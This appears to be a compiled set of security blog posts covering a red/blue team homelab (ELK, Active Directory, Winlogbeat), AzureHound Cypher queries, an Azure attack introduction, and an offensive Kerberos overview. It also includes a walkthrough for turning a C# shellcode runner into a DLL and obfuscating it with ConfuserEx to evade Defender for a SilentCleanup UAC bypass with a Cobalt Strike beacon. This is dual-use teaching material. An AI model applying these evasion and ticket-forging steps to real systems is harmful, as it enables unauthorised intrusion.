Creating a Red & Blue Team Homelab

Over the years of penetration testing, red teaming, and teaching, I (and I’m sure a lot of others) are often asked how to get started in infosec. More specifically, how to become a pentester/red teamer or threat hunter/blue teamer. One of the things I always recommend is to build out a lab so you can test TTPs (techniques, tactics, procedures) and generate IOCs (indicators of compromise) so that you can understand how an attack works and what noise it generates, with the aim of being either to detect that attack or modify it so it’s harder to detect. It’s not really an opinion, but a matter of fact, that being a better blue teamer will make you a better red teamer and vice-versa. In addition, one of the things that I ask in an interview and have always been asked in an interview, is to describe what your home lab looks like. It’s almost an expectation as it is so crucial to be able to experiment with TTPs in a non-production environment. This post is aimed to help you create a home lab that will allow you to both do red team and blue team activity.

Hardware

One of the first questions that’s asked about a home lab is the cost. There’s a few ways to answer this.

  1. Host everything locally on your PC/laptop.
  2. Host everything on a dedicated server
  3. Host everything in the cloud

The other question is what is the necessary size of the lab? Home-labs do not have to replicate the size of an enterprise company. My home lab is setup as shown below, which is what will act as a template for this post.

Figure 1: One of many ways to set up a home lab

In my person lab I run two Windows Servers and three Windows workstations. You could absolutely just have one server and one workstation, it’s just a matter of what you’re trying to accomplish. So, to answer the question of “what will it cost”, the answer is “it depends”. Personally I use a computer to act as a server which cost me about $400 to build which runs ESXI 7 to host all the VMs. Cloud could initially be cheaper, but in the long run it will probably cost more. I used to run everything locally on my work PC but I started to run out of disk space with all the VMs. As far as this guide goes, however you choose to host your VMs is up to you.

Hosting OS links:

Server Operating Systems:

ESXI 7

Hyper-V

Workstation Applications:

VMWare Workstation Player

Virtual Box

Cloud:

AWS

Azure

Architecture

How your lab is architected/laid out is a big deal. You want to mimic a real environment as much as possible which is why I suggest building a lab that runs Window’s Active Directory (AD). I don’t think I’ve been in an environment where AD was not being used. We will start by using Windows evaluation licenses.

Windows 10

Windows Server 2019

And we will use Debian 10 to build an ELK (Elasticsearch, Logstash, Kibana) server.

Debian 10

Finally, for our attacking machine and for simplicity we will just use Kali

Kali Linux

ELK Setup

Before setting up Windows, we will set up an ELK server. ELK (Elasticsearch, Logstash, Kibana) is a widely used platform for log processing. As a blue teamer, you want this because digging through logs is a key piece to threat hunting. As a red teamer, you want this to know what IOCs are generated from the TTPs you use.

Keep in mind this lab is meant to be for internal, private use only. The setup of these servers will not be secure and should not be used in a production environment.

Start off by downloading the Debian 10 ISO and then create a VM to boot off the ISO. I won’t go into the specifics on creating a VM as it’s platform specifics (e.g. VirtualBox, VMWare, etc.), but there’s a good article here for VMWare.

Once you install Debian and log in, you’ll want to first add your current user to the sudoers group. First, escalate to root:

sudo su

Then add your user to the sudoers group.

sudo usermod -aG sudo [username]

Then switch back to your user

su [username]

Next, add the GPG key for the Elastic repository

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

And add the repository definition

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Now update apt

sudo apt-get update

And install logstash

sudo apt-get install logstash

Then Java

sudo apt-get install openjdk-11-jre

Then install Elasticsearch

sudo apt-get install elasticsearch

and finally Kibana

sudo apt-get install kibana

Next is to enable services

sudo /bin/systemctl enable elasticsearch.service && sudo /bin/systemctl enable kibana.service && sudo /bin/systemctl enable logstash.service

Before we start the services, there’s a few config changes we need to make.

sudo nano /etc/kibana/kibana.yml

Uncomment server.host and set the IP to 0.0.0.0 to listen on all interfaces and uncomment server.port. You can leave the port to 5601.

Figure 2: Setting the Kibana Config file

Save the file (ctrl+O, Enter, ctrl+x)

and now edit the elasticsearch config file

sudo nano /etc/elasticsearch/elasticsearch.yml

Set the network.host line to 0.0.0.0 and http.port to 9200

Figure 3: Setting the Elasticsearch config settings

And add an additional line at the bottom

discovery.type: single-node

Save the file (ctrl+O, Enter, ctrl+x)

And start the services

sudo service logstash start
sudo service elasticsearch start
sudo service kibana start

Now if you browse to your Debian machine’s IP on port 5601 you should see Kibana.

ip addr
Figure 4: Viewing the host’s IP
Figure 5: Kibana/Elastic homepage

Windows Setup

Once again, I will not be showing how to deploy a VM as I want this post to be platform agnostic. So for setting up Windows, this will be under the impression you have stood up a Windows 2019 Server and Windows 10 machine.

In this section we will create an Active Directory lab by making a Domain Controller and Workstation.

Windows Server 2019

Once Server 19 is stood up, the first thing you should do is set a static IP. If you don’t, the machine’s IP can change which will break the environment. For reference, these are my settings.

Figure 6: Server’s IP settings

The import part here is setting the DNS servers. The preferred DNS will be localhost (127.0.0.1) as we will install the DNS service on the machine in a moment. Then setting Google’s DNS server as a secondary so it can reach the internet (optional, completely OK if you do not want your lab to reach the internet).

Next, rename the server to something more conventional. I named mine PRIMARY as it will act as the primary domain controller in the environment.

Figure 7: Go to Start>Type in “rename” and this is the screen that will be brought up
Figure 8: Renaming the server to PRIMARY

Reboot the server for the new settings to take effect. Once rebooted, you should have the server manager dashboard. Click on ‘Add roles and features’

Figure 9: Server Manager Dashboard

Click next until you get to ‘Server Roles’. Add DNS and Active Directory Domain Servers

Figure 10: Adding DNS and ADDS services

Click next until it asks for confirmation, then click install.

Figure 11: Installing features

After it installs, the server dashboard will have a notification. Click on it and click ‘Promote this server to a domain controller’

Figure 12: Promote the machine to a DC

Once you click promote, it will bring up another window. Click ‘Add a new forest’ and give the domain a name. I named mine ‘LAB.LOCAL’

Figure 13: Give your domain a name

Next, leave the default functional levels (Unless you’re adding a 2012, 2008, or 2003 server, then change it to those). Then set the DSRM password to something you’ll remember.

Figure 14: Setting the DSRM password

Click next until you get to the prerequisite check, then click ‘install’.

Figure 15: Prereq check will give warnings

Once done, reboot the server.

Once rebooted, in the Server Dashboard, click on Tools>ADUC (Active Directory Users and Computers)

Figure 16: Tools>ADUC

ADUC is used to manage users, groups, and computers (among other things). In this instance we just want to create a new user and assign them to the Domain Administrator role.

In ADUC, click on your domain on the left then select ‘Users’. At the top, click the icon shown below to create a new user.

Figure 17: Creating a new user in ADUC

Give them a name where you can identify them as an administrator by their name. Commonly in environments, they have ADM, ADMIN, -A, or some moniker to signify it’s a privileged account. Once created, right click on that user in ADUC and click ‘Add to a group’

Figure 18: Adding the user to a group

Then type in ‘Domain Admins’ and select ‘OK’.

Figure 19: Adding the user to the Domain Admins group

Once the user is added to the Domain Admins group, switch over to the Windows 10 workstation. Once again, I will assume the provisioning of the machine was already done and it is able to communicate with the domain controller. A simple test is to ping the Domain Controller’s IP and ensure they can talk to each other on the network.

On the Windows 10 machine, edit the DNS settings to include your Domain Controller’s IP address. Below is a shown example.

Figure 20: Networking settings for Windows 10

Click on the Windows icon, type in ‘join domain’ and open up ‘Access work or school’. Click on the ‘Connect’ button and then click ‘join this device to a local Active Directory domain’.

Figure 21: Select the highlighted box

Enter the FQDN (Fully qualified domain name) of your domain and click ‘next’.

Figure 22: Enter the FQDN of your domain.

Note: If you get an error saying the domain was unable to be found, double check your DNS settings and ensure the Windows 10 machine can reach the Domain Controller.

You will then be prompted for credentials. This is where you will input your newly created Domain Administrator’s credentials.

Figure 23: Enter your DA’s credentials to join the domain

Reboot the PC and it will then be joined to the domain.

Winlogbeat

Now that we have a workstation and domain controller as well as an ELK server, we need to configure our two Windows machines to send logs to the ELK server. To do this, we need a program called ‘Winlogbeat‘. In addition, I recommend also installing Sysmon. Download the .zip file for Winlogbeat and unzip it to a folder inside one of the Windows machines. Open a PowerShell window and navigate to the Winlogbeat directory in PowerShell. Run the following command

Set-ExecutionPolicy bypass

Select [a] when prompted

Then run the script

 .\install-service-winlogbeat.ps1
Figure 24: Installing Winlogbeat

Next, open “winlogbeat.yml” in Notepad. Copy+paste the following while changing the “hosts” IPs to match your ELK’s server IPs.

======================= Winlogbeat specific options ==========================
 winlogbeat.event_logs:
 name: Application
 ignore_older: 30m
 name: Security
 ignore_older: 30m
 name: System
 ignore_older: 30m
 name: Microsoft-windows-sysmon/operational
 ignore_older: 30m
 name: Microsoft-windows-PowerShell/Operational
 ignore_older: 30m
 event_id: 4103, 4104
 name: Windows PowerShell
 event_id: 400,600
 ignore_older: 30m
 name: Microsoft-Windows-WMI-Activity/Operational
 event_id: 5857,5858,5859,5860,5861 
 output.elasticsearch:
   hosts: ["ELKIPHERE:9200"]
   username: "elastic"
   password: "changeme"
 setup.kibana:
   host: "ELKIPHERE"

Then start the winlogbeat service

Start-Service winlogbeat
Figure 25: Starting winlogbeat

Once the service is started you can verify that the connection works by running

.\winlogbeat setup -e
Figure 26: Checking winlogbeat config file

Click the drop down menu on the side and under ‘Analytics’ and go to ‘Discover’. You should now be seeing Windows logs.

Figure 28: Viewing Windows Logs

Ensure that the time is synchronized properly within your lab as those are the times that will be reflected with the logs in Kibana. Otherwise, you can set your time filter to a different time.

Your basic detection lab is now ready to go! As said earlier, I recommend installing Sysmon on the Windows hosts to get detailed events out of them.

AzureHound Cypher Cheatsheet

List of Cypher queries to help analyze AzureHound data. Queries under ‘GUI’ are intended for the BloodHound GUI (Settings>Query Debug Mode). Queries under ‘Console’ are intended for the Neo4j console (usually located at http://localhost:7474). Download the ‘Custom Queries’ json file here: https://github.com/hausec/Bloodhound-Custom-Queries

GUI

Return All Azure Users that are part of the ‘Global Administrator’ Role

MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p

Return All On-Prem users with edges to Azure

MATCH  p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p

Find all paths to an Azure VM

MATCH p = (n)-[r]->(g:AZVM) RETURN p

Find all paths to an Azure KeyVault

MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p

Return All Azure Users and their Groups

MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p

Return All Azure AD Groups that are synchronized with On-Premise AD

MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n

Find all Privileged Service Principals

MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p

Find all Owners of Azure Applications

MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p

Console

Return All Azure Users

MATCH (n:AZUser) return n.name

Return All Azure Applications

MATCH (n:AZApp) return n.objectid

Return All Azure Devices

MATCH (n:AZDevice) return n.name

Return All Azure Groups

MATCH (n:AZGroup) return n.name

Return all Azure Key Vaults

MATCH (n:AZKeyVault) return n.name

Return all Azure Resource Groups

MATCH (n:AZResourceGroup) return n.name

Return all Azure Service Principals

MATCH (n:AZServicePrincipal) return n.objectid

Return all Azure Virtual Machines

MATCH (n:AZVM) return n.name

Find All Principals with the ‘Contributor’ role

MATCH p = (n)-[r:AZContributor]->(g) RETURN p

Using a C# Shellcode Runner and ConfuserEx to Bypass UAC

I was recently on an engagement where we phished in and ran into UAC which gave me more trouble than I expected. When a user logs onto Windows, a logon session is created and the credentials are tied into an authentication package inside of the logon session. Whenever a process wants to act as a user or use the user’s credentials, it uses a token. These tokens are tied to the logon sessions and ultimately determine how the credential is used. In the case of User Access Control (UAC) and Administrative users, the token is effectively split into two levels. Tokens have different integrity levels:

  • Low – Very restrictive, commonly used in sandboxing
  • Medium – Regular user
  • High – Administrative privileges
  • System – SYSTEM privileges

UAC splits the Administrative user’s token into a medium and a high integrity token. When that user tries to run something as an administrator, a prompt is shown which they must accept, which then the high integrity token is then applied to that process or thread.

Figure 1: UAC Prompt

A UAC bypass is going from the Administrative user’s medium integrity token to high integrity token without having to interact with the prompt. In Cobalt Strike, this can be observed in a medium integrity context by typing get privs.In addition, the user will not have an asterisk * next to their name.

Figure 2: What a Medium “Normal User” Integrity token looks like in Cobalt Strike
Figure 3: What a high “Administrator” integrity token looks like in Cobalt Strike

UAC Bypasses are not anything new and have existed for quite sometime, an exhaustive list can be found here: https://github.com/hfiref0x/UACME#usage

Tons of PowerShell scripts and some C# tools exist around using some of these techniques in order to bypass UAC. There’s even Cobalt Strike Aggressor scripts to automate it for you. A lot of the UAC bypasses in the aforementioned page have been remediated, however there’s still a few that exist. One that I’m particular of is my from my co-worker’s, @enigma0x3 & @mattifestation, research which DLL hijacks the ‘SilentCleanup’ scheduled task, which more can be read about here: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/

The problem I ran into, was these tools and scripts leveraged the built-in payload generator in Cobalt Strike, which always immediately get picked up by AV and EDRs. My goal then was to find out a way to generate a DLL that can run shellcode and not be picked up by AV. Finding a specific shellcode runner that spits out a DLL turned up short, however since EXEs and DLLs are both PEs, I figured I could just modify an existing shellcode runner to compile into a DLL.

After a bit of tinkering with quite a few shellcode runners, I ended up using one of my co-worker’s, @djhohenstein, projects, CSharp SetThreadContext. which stemmed from @_xpn_‘s work here. The beauty of this project is that it automatically determines an executable to spawn into, which avoids Get-InjectedThread.

After struggling for a bit on how to get the project to compile a working .DLL instead of an .EXE, I (once again) stumbled upon @_xpn_‘s work here. The TL;DR of it, is there is a NuGet package that will automatically export a function from the project so an entry point is available when called with rundll32.exe. Keep in mind this is for 64-bit architecture.

First, generate the payload using Cobalt Strike (or whatever C2 you prefer).

Figure 4: Generating a stageless payload for Cobalt Strike. This will output in .bin format.

Follow Dwight’s instructions on generating the encrypted.bin file here. Build the .EXE, which is the default output type, and ensure that it successfully works and establishes a beacon. Next, install the NuGet package ‘DllExport’ by right clicking on the solution an selecting ‘Manage NuGet Packages for Solution…’

Figure 5: Managing the NuGet Packages

Click on ‘Browse’ and search for ‘DllExport’, then install the package. Once it finishes installing, it will run a .bat file to set up the DLL Export type. Ensure that the ‘Runner’ project is selected, then ensure the settings match the ones pictured below.

Figure 6: Using DllExport

Once setup, it will ask to reload the project, which choose ‘Yes’ to. Next, add the DllExport attribute right before the Main function. At the same time, clear the Main function’s argument.

Figure 7: Adding the [DllExport] attribute to the project & clearing the “Main” function of arguments.

The next steps are import to ensure the DLL is generated in the correct architecture or else the code will not run. I probably spent more time on this part than what was necessary.

At the top of Visual Studio, click the drop down menu where it says ‘Any CPU’ and click on ‘Configuration Manager’

Figure 8: Click on Configuration Manager.

Change the ‘Active Solution platform’ to x64

Figure 9: Configuration Manager settings

To the left of the configuration manager menu, change the build to ‘Release’.

Next, right click on ‘Runner’ in the solution explorer and click on ‘Properties’. Change the Output type to ‘Class Library’.

Figure 10: Changing output of the project to DLL instead of EXE

Next, click on the ‘Build’ tab on the left, and check “Optimize code”

Figure 11: Settings for the build

Now you can right click on ‘Runner’ in the solution explorer and select ‘Build’ to build the .DLL.

The working DLL will be placed in \CSharpSetThreadContext\Runner\bin\Release\x64\Runner.dll

Author’s Note: I’m not sure why it requires so much finessing, but I’m open to any optimizations or explanations if anyone knows. Specifically, only the DLL in the \x64\ directory will work, for some reason the one that’s under \Release\ does not contain the entrypoint that should be generated by [DllExport], even though it’s built at the same time as the one in \x64\.

You can then run the DLL (ensure it’s the one in the x64 directory)

rundll32.exe .\Runner.dll,Main

Figure 12: Running the DLL and getting a beacon back.

Now that we have a working DLL shellcode runner, we can run it through ConfuserEx to perform basic AV evasion on it.

Figure 13: Bypassing Defender with ConfuserEx. ConfuserEx settings part snipped out, that’s for you to find out 🙂

With a working DLL shellcode runner that will bypass AV (Defender at least), we can then use it for a UAC Bypass. For the actual bypass, I use @chryzsh‘s Aggressor script here which includes an edited version of the C# binary located here. I once again use ConfuserEx on that binary to evade AV (again, at least Defender). The last step is to edit the Aggressor script to not create the built-in Cobalt Strike Payload and upload it. Also change the function after \\temp.dll from ‘Start’ to ‘Main’.

Figure 14: Editing uac-silentcleanup.cna

Rename Runner.dll to temp.dll (Or edit the Aggressor script to execute whatever name you want) and upload it to “C:\Users\[User]”. Finally, string it all together to form a UAC bypass.


Credits & Acknowledgements

Kerberosity Killed the Domain: An Offensive Kerberos Overview

Kerberos is the preferred way of authentication in a Windows domain, with NTLM being the alternative. Kerberos authentication is a very complex topic that can easily confuse people, but is sometimes heavily leveraged in red team or penetration testing engagements, as well as in actual attacks carried out by adversaries. Understanding how Kerberos works legitimately is essential to understanding the potential attack primitives against Kerberos and how attackers can leverage it to compromise a domain. This article is intended to give an overview of how Kerberos works and some of the more common attacks associated with it.

Overview

Kerberos revolves around objects called ‘tickets’ for authentication. There’s two types of tickets:

  • Ticket-Granting-Ticket (TGT)
  • Ticket-Granting-Service (TGS, also called a ‘service ticket’)

When a user logs into Windows on a domain-joined computer, the password they input is hashed and used as a key to encrypt a timestamp which is sent to the Key-Distribution Center (KDC), which is located on the domain controller. This encrypted timestamp is then sent as an AS-REQ (Authentication Server Request). The KDC then verifies the user’s credentials by decrypting the request with the user’s password hash in AD and verifying the timestamp is within acceptable limits. The KDC then responds with an AS-REP (Authentication Server Reply).

AS

The AS-REP contains the TGT encrypted with the KRBTGT’s key (password hash) as well as some other data encrypted with the user’s key. The KRBTGT account is an account that is created when promoting a DC for the first time and is used by Kerberos for authentication. Compromising the KRBTGT account password has very serious implications to it, which will be covered later.

Now that the user is authenticated in the domain, they still need access to services on the computer they’re logging into. This is accomplished by requesting a service ticket (TGS) for a service principal via TGS-REQ. A service principal is represented through its service principal name (SPN). There’s many SPNs, a majority of which can be found here. For accessing the actual machine, the SPN ‘HOST’ is requested. HOST is the principal that contains all the built-in services for Windows.

tgsreq

A TGS contains a Privileged Attribute Certificate (PAC). The PAC is what contains information about the user and their memberships, as shown in figure 3.

pac

The GroupIDs are what the service looks at to determine if that user has access to it. In order to prevent tampering, the TGS is encrypted using the target service’s password hash. In the case of HOST/ComputerName, this would be the machine account password hash. The reason account password hashes are used to encrypt/decrypt tickets is because those are the only shared secrets between the account and the KDC/Domain controller.

tgsrep

Once the TGS is received, via TGS-REP, the target service decrypts the ticket with it’s password hash (in this case, it’s the computer account’s password hash) and looks in the TGS’s PAC to see if the appropriate group SIDs are present, which determines access. The key distinction with service tickets, is that the KDC does the authentication (TGT) where the service does the authorization (PAC in the TGS). Once confirmed, the user is allowed to access the HOST service principal and the user is then logged into their computer.

This entire logon process can be viewed in Wireshark when capturing a login process for another user.

atuh

In figure 5, the first AS-REQ is responded with ‘KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED’. Prior to Kerberos version 5, Kerberos would allow authentication without a password. In Version 5, it does require a password, which is called Pre-Authentication. Presumably for backwards compatibility reasons, Kerberos tries to authenticate without a password first, before using Pre-Authentication, which is why there’s always an error after the initial AS-REQ during a logon. This leads in to the first attack that will be covered, AS-REP Roasting.

AS-REP Roasting

asreproiast

There is a setting in the Account options of a user within AD to not require Kerberos Pre-Authentication.

Since a timestamp encrypted with the user’s password hash is used as an encryption key for an AS-REQ, if the KDC successfully reads the timestamp using the user’s password hash, as long as the timestamp falls within a few minutes of the KDC’s time, it issues the TGT via AS-REP. When Pre-authentication is not required, an attacker can send a fake AS-REQ which the KDC will immediately grant a TGT  because there’s no password needed for verification. Since part of the AS-REP (apart from the TGT) contains data (a session key, TGT expiration time, and a nonce) that is encrypted with the user’s key (password hash), the password hash is able to be pulled from that request and cracked offline. More can be read here.

In Rubeus, this can be accomplished with the asreproast function.

Kerberoasting

When a TGS is issued, a timestamp + password hash for the service account is used to encrypt the TGS since the password is the shared secret between the service account and the KDC/DC. This is most commonly a service (such as HOST or CIFS) that is controlled by the computer, so the computer account password hash is used. In some cases, user accounts are created to be “service accounts” and registered as a service principal name. Since the KDC does not perform authorization for services, as that is the service’s job, any user can request a TGS for any service. This means that if a user “service account” is registered as an SPN, any user can request a TGS for that user which will be encrypted with the user account password hash. That hash can be extracted from the ticket and cracked offline.

With Rubeus, this can be accomplish using the kerberoast function.

Golden Ticket

As briefly mentioned earlier, when a TGT is issued, it is encrypted with the KRBTGT’s account password hash. The KRBTGT’s password, by default, is never set manually and thus is as complex as a machine accounts password. A golden ticket attack is when the KRBTGT password is compromised and an attacker forges a TGT.  The RC4 hash of the KRBTGT password can be used with mimikatz to forge a ticket for any user without needing their password.

 

mimi

 

Silver Ticket

Where a golden ticket is a forged TGT, a silver ticket is a forged TGS. The major opsec consideration with golden tickets is that there is a transaction that occurs within the KDC — a TGT is issued, which allows defenders to alert on these transactions and potentially catch golden ticket attacks. Silver tickets are much more stealthy because they never touch the KDC. Since a service ticket is being forged, knowledge of the target service’s password hash is needed, which in most cases will be the machine account password hash. In the case of service accounts with an SPN set, a silver ticket can be generated for that SPN.

For example, if a service account is created under the username ‘MSSQLServiceAcct’ and registered for the MSSQLSVC principal, the SPN would be MSSQLSVC/MSSQLServiceAcct. If an attacker obtained that accounts password hash (via Kerberoasting or other means), it could then forge a TGS for that SPN and access the service that utilizes it (MSSQLSVC).

In the case of certain services, such as CIFS, where an SPN for a user account (e.g. CIFS/Alice) is made, a silver ticket for CIFS using the user’s password will not work because the user does not control access to that service, the machine account does.

In the example shown below, an attacker gained knowledge of the domain controller’s computer account hash and generated a silver ticket for CIFS to access it’s file system.

st

One caveat to this attack, is PAC validation is a feature where the ticket will be sent to the KDC for verification, which could cause this attack to fail.

Delegation Attacks

Kerberos utilizes something called ‘delegation’, which is when an account can essentially re-use, or “forward”, a ticket to another host or application.

For example, in figure X, a user is logged into a web application which uses a SQL DB on another server. Instead of the web application’s service account having full access to the entire server the SQL DB is running on, delegation can be configured so that the service account on the web application server can only access the SQL service on the SQL server. In addition, the service account will be used for delegation, meaning it will access the SQL server on the user’s behalf and with that user’s ticket. This limits both the service account from having complete access to the SQL server, as well as ensuring only authorized users can access the SQL DB through the web application.

Delegation

There’s three main types of delegation, each with their own attack primitives:

  • Unconstrained
  • Constrained
  • Resource-Based Constrained (RBCD)

Unconstrained Delegation

Unconstrained Delegation is a very historic way of performing delegation, during Windows 2000. This is configured on the ‘Delegation’ tab of a computer object within AD.

unconst
unconstprocess

When a machine is configured for unconstrained delegation, any TGS that is sent to the host and contains an SPN, will be accompanied with a TGT and that TGT will be kept in memory for impersonation. The security implication with this, is that if an attacker is monitoring the memory for Kerberos ticket activity, once a TGS is sent to the host, the attacker can extract the TGT and re-use it.

uncon2

This can be taken a step further by coercing authentication from any machine in the domain to the unconstrained delegation host via the printer bug. The printer bug is a “feature” within the Windows Print System Remote Protocol that allows a host to query another host, asking for an update on a print job. The target host then responds by authenticating to the host that initiated the request, via TGS (which contains a TGT in the case of unconstrained delegation).

What this means, is that if an attacker controls a machine with unconstrained delegation, they could use the printer bug to coerce a domain controller to authenticate to their controlled machine and extract the domain controller’s computer account TGT.

PrinterBug

This is possible using Rubeus and SpoolSample.

An important final note is that domain controllers will always have unconstrained delegation enabled by default.

Constrained Delegation

Constrained delegation was introduced during Windows 2003 as an improvement to unconstrained delegation. The major change was that services are limited for an account/machine when impersonating a user (i.e. being delegated). Constrained delegation settings are located in the ‘delegation’ tab of an object within Active Directory Users and Computers

const1

This can also be checked across the domain by looking for the msDS-AllowedToDelegateTo property in accounts/machines via the PowerView function:

Get-DomainUser USERNAME -Properties msds-allowedtodelegateto,useraccountcontrol

Before using the attack, it’s essential to understand how constrained delegation legitimately works. Constrained delegation uses two main Kerberos extensions: S4U2Self and S4U2Proxy. @harmj0y covered the technical details here, but at a high level, S4U2Self allows an account to request a service ticket to itself on behalf of any other user (without needing their password). If the TRUSTED_TO_AUTH_FOR_DELEGATION bit is set, The TGS will then be marked as forwardable.

S4U2Self

Then the S4U2Proxy is leveraged by the delegated account by using the forwardable TGS to request a TGS to the specified SPN. This is accomplished by the MS-SFU Kerberos extension which allows a TGS to be requested with a TGS.

S4U2Proxy

Now that service 1 (HTTP/WebServiceAcct) has a ticket for service 2 (MSSQLSvc/SQLSA), service 1 presents that ticket to service 2, who then verifies if the user is allowed to access the service via SIDs within the PAC of the TGS.

afterproxy

The attack primitive abuses the S4U2Self and S4U2Proxy extensions. If there is an SPN set in the msDS-AllowedToDelegateTo property for an account and the userAccountControl property contains the value for ‘TRUSTED_TO_AUTH_FOR_DELEGATION”, that account can impersonate any user to any service in that SPN. While it was explained that the S4U2Self extension allows a service to request a TGS to itself on behalf of any user, the additional part of the attack is that the sname (service name) field of the SPN in the (second) TGS is not protected, which allows an attacker to change that to be any service they desire.

The full attack path then looks as followed:

  • Attacker Kerberoasts an account (WebSA) that has the msds-AllowedToDelegateTo property set with the SPN of MSSQLSvc/LABWIN10.LAB.local in the property, meaning WebSA can delegate other accounts to access the MSSQLSvc on LABWIN10.LAB.local.
  • Rubeus is used to automatically use the S4U2Self extension to request a TGS for the current user, WebSA, on behalf of the user ‘Admin’. The returned TGS is marked “forwardable”.
  • Rubeus then automatically uses the S4U2Proxy extension to use the MS-SFU extension and request a TGS for the delegated SPN, but changing the service portion to whatever the user specifies, e.g. instead of MSSSQLSvc/LABWIN10.LAB.local, it requests a TGS for HOST/LABWIN10.LAB.local. Since the service part is not verified, the TGS is returned as the user ‘Admin’ and SPN HOST/LABWIN10.LAB.local
  • The ticket is imported into memory and the user can now access HOST/LABWIN10 as the ‘Admin’ user, as specified in the TGS.
CONST

constcommand

One final note on constrained delegation:

TRUSTED_TO_AUTH_FOR_DELEGATION is needed for S4U2Self, but not present by default when adding an SPN for delegation on an account. It can be be modified/added if you have the SeEnableDelegationPrivilege over a domain controller.

Resource-Based Constrained Delegation

Resource-Based Constrained Delegation (RBCD) is an improvement on constrained delegation and introduced with Windows Server 2012. The major change in delegation, is that instead of specifying an SPN in the ‘Delegation’ tab of an account, the delegation settings are now controlled by the resource instead. In the previous example with constrained delegation, this would mean that delegation is configured on the backend SQL service, instead of the web service account that delegates to the SQL service.

Where constrained delegation sets the SPN in the msDS-AllowedToDelegateto property, RBCD uses the msDS-AllowedToActOnBehalfOfOtherIdentity property on a computer object. Elad Shamir did an excellent write-up on how this can be abused. The summary of the article, is that if the TRUSTED_TO_AUTH_FOR_DELEGATION userAccountControl flag is not present, S4U2Self will still work, but the returned service ticket will not be marked forwardable. In the context of traditional constrained delegation, this means it couldn’t be used in the S4U2Proxy extension. However, with RBCD, even if the ticket is not marked as forwardable, it still works.

The attack primitive then, is if an attacker has control of an account with an SPN set and there’s a computer account that has the msDS-AllowedToActOnBehalfOfOtherIdentity property set, the computer can be compromised. In addition, if the attacker has GenericWrite privileges over the computer account, they can compromise the computer due to being able to modify the ‘AllowedToAct’ attribute and setting it to an SPN they control.

If an attacker does not have an account with an SPN set, they can create one by creating a computer object. By default, standard users in AD can create up to 10 computer objects. This can be done with Kevin Robertson’s PowerMad project.

The attack path then looks like this:

  • Attacker discovers they have GenericWrite privileges over a computer
  • If the attacker doesn’t have an account with an SPN set, PowerMad is used to create a machine account, so now the attacker has an account with an SPN.

OR

  • Attacker discovers the msDS-AllowedToActOnBehalfOfOtherIdentity on a computer is set for an SPN that the user has already compromised

THEN

  • Rubeus’ S4U function is used to request a ticket on behalf of any user, via S4U2Self, to the account with an SPN set (e.g. Getting a TGS for Administrator for newmachine$)
  • Rubeus’ S4U function then uses S4U2Proxy to request a TGS as Administrator (with the TGS from S4U2Self) to the target machine. The ticket is not marked as forwardable, which under traditional constrained delegation, would fail, but under RBCD, it does not matter and succeeds.
  • The attacker now is able to access the target computer

In figure X, the attacker has compromised Bob, a user account with an SPN set.

For a transcript of the commands used, reference @harmj0y’s gist here (I slightly modified some commands for the User SPN instead of computer account).

Resources:

  • Attacking Azure, Azure AD, and Introducing PowerZure

    Over the past decade, Azure’s presence in businesses has grown significantly as new features and support were added to Azure. The purpose of this article is to cover three main points:

    1. Explain the components of Azure and how they fit into a modern IT environment.
    2. Explain how certain things within Azure can be leveraged from an offensive perspective.
    3. Introduce the PowerZure project and explain how it helps offensive operations against Azure.
      https://github.com/hausec/PowerZure

    Background

    Azure was released in 2010 as “Windows Azure” and was renamed “Microsoft Azure” in 2014 to imply that Azure covers more than just Windows products, as well as the major addition of Azure Resource Manager (Azure RM) and Azure Active Directory (Azure AD). It started as Platforms as a Service (PaaS) to spin up Virtual Machines (VMs), Storage, WebApps, and SQL Databases but has now evolved into Infrastructure as a Service (IaaS), as well as Software as a Service (SaaS), offering over 600 services.

    Enter a Figure 1: Overview of Azure’s offerings.caption

    Current implementations of Azure often involve using several components shown above, which will be highlighted.

    Components

    Azure’s architecture is complicated as there are several components. There are a few components that are essential to understand as they are commonly used within businesses.

    Enterprise

    This represents the Azure global account. It’s the unique identity that the business owns and allows access to subscriptions, tenants, and services.

    Tenant

    Tenants are instances of Azure for the Enterprise. An Enterprise can have multiple tenants. This is often seen in companies that are geographically separated or subsidiaries. Access to one tenant in an enterprise does not give access to another tenant. An analogy is that tenants are similar to Forests in Active Directory, where trusts can be established (within Azure AD), but that is not default and must be configured.

    Subscriptions

    Subscriptions are how you gain access to Azure services (Azure itself, Azure AD, Storage, etc). Subscriptions are often broken out into uses for the businesses, e.g. a subscription for production web apps, another subscription for development web apps, etc.

    Resources

    Resources are the specific application, such as SQL servers, SQL DBs, virtual networks, run-books, accounts, etc.

    Resource Groups

    Resource groups are the containers that house the resources. Business will often have multiple resource groups depending on their usage of the resource.

    Runbooks

    Runbooks are part of the Azure Automation service and support scripting languages PowerShell and Python (2.7). These allow for automation of operations within Azure, e.g. start-up of multiple virtual machines at once. There are possible attack vectors within Runbooks that are covered later.

    Azure Active Directory

    Azure Active Directory (Azure AD) is directory services in the cloud. There are many differences between it and on-premise AD, which is also covered later.

    Azure AD Connect

    Azure AD connect is the tools that actually connects on-premise with Azure AD. It has features such as hash synchronization and federation (between Tenants) to link to on-premise AD.

    Service Principal

    An Azure service principal is a security identity used by user-created apps, services, and automation tools to access specific Azure resources. Think of it as a ‘user identity’ (login and password or certificate) with a specific role, and tightly controlled permissions to access your resources. It only needs to be able to do specific things, unlike a general user identity. It improves security if you only grant it the minimum permissions level needed to perform its management tasks. For example, an organization can assign its deployment scripts to run authenticated as a service principal.

    Architecture

    A visualization of Azure’s architecture is shown below

    Picture1

    AzureAD

